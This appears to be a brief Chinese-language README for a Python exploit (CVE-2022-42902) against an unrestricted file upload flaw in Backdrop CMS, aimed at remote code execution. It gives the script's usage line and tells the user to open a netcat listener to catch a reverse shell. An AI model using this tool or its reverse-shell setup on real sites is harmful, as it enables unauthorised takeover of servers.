此 Python 漏洞利用脚本针对 Backdrop CMS 中的不受限制的文件上传漏洞,以实现远程代码执行(RCE)。
1.22.0 及之前版本 注意:Backdrop CMS 对此提出异议,认为需要高级权限,因此该漏洞可能仍存在于 1.22.0 以上的版本中。我猜测他们的意思是你需要先拥有管理员访问权限。尽管如此,它仍然是一个有效的漏洞,并且绝对可以利用它来获得系统的完全控制权。
python3 CVE-2022-42902.py <target_url> <username> <password> <listener_ip> <listener_port>
重要提示:在运行脚本之前,请先启动你的监听器:
nc -lvnp <listener_port>
